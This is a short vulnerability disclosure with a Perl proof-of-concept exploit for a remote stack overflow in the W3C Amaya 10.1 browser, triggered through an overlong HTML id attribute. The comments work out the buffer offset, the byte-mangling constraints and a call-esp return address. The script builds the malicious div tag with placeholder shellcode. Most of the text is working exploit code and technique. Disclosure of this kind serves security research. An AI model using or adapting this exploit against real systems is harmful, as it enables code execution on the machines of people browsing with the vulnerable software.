The W3C Amaya web browser version 10.1 remote stack overflow exploit that relates to the id tag.
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# W3C Amaya 10.1 Web Browser
#
# Amaya (id) Remote Stack Overflow Vulnerability
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/41/
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#
# Shellcode notes:
# The application fails to correctly process certain bytes:
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf 0xeb).
#
# After reviewing the source code, the below function modifies the
# shellcode:
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1fffff <-- Thanks Luigi!
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# The "id" variable of a tag contains a buffer overflow:
# <div id=" 93*'A/' ">r0ut3r</div>
#
# The application will not overflow with normal alphanumeric characters.
# To fill the buffer I had to use "A/" repeated 91 times. Therefore buffer length is:
# 91 * 2 = 182 + 4
#
# [junk] + [eip] + [shellcode]
# 182 + 4 + sizeof(shellcode)
#
# ESP points to data after EIP.
#
# "id" variable Proof of concept:
#!/usr/bin/perl
use warnings;
use strict;
my $shellcode = 'C' x 350;
# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data = '<div id="' .
'A/' x 91 .
"\x53\x5f\x03\x7d" . # eip (ESP points to stuff after RET, so shellcode)
$shellcode .
'">test</div>';
print $data;